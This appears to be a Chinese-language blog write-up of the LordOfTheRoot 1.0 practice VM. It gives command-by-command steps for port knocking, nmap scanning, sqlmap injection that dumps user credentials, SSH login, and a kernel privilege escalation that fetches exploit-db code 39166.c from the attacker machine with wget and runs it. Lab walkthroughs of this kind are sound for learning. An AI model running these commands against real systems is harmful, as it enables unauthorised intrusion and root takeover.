都设为nat模式查看靶机物理地址
kali:192.168.11.128
靶机:192.168.11.140
nmap -A -p- 192.168.11.140
扫描发现只开放22端口尝试连接
提示敲门程序在运行
发送tcp的数据包分别到这三个端口
nmap -r -Pn -p 1,2,3 192.168.11.140
再次扫描端口
nmap -A -p- 192.168.11.140
发现开启了1337端口
翻译了一下
拼接路径mordor
没什么信息查看源码
发现一段密文
进行解密
解密两次得到新的路径/978345210/index.php
是个登录页面
弱口令不行
登录页面还可以测sql注入
sqlmap -o -u http://192.168.11.140:1337/978345210/index.php --forms --dbs --batch
-o:开启所有优化
-u:指定目标URL
–forms:自动判断注入
–dbs:枚举DBMS所有的数据库名称
--batch 自动选择
sqlmap -o -u http://192.168.11.140:1337/978345210/index.php --forms -D Webapp --tables --batch
sqlmap -o -u http://192.168.11.140:1337/978345210/index.php --forms -D Webapp -T Users --dump --batch
得到用户名和密码,使用这些用户名和密码ssh登录
ssh *用户名*@*ip*
可以将这些用户名密码各做一个字典进行爆破登录
最后成功登录
用户名:smeagol
密码:MyPreciousR00t
登陆成功
接下来就是提权操作
uname -a查看靶机内核版本和系统版本
在https://www.exploit-db.com/查找可利用漏洞
搜索Ubuntu 14.04
下载并拖到kali中
在开一个终端
python -m http.server 4444
wget http://192.168.11.128:4444/39166.c
编译
gcc 39166.c -o p
-o指定编译后的文件名
给执行权限
chmod +x p
运行
./p
提权成功
查看flag
标签:index,用户名,http,--,192.168,LordOfTheRoot,1.0,11.140 From: https://blog.csdn.net/Lpyzdzs/article/details/143466415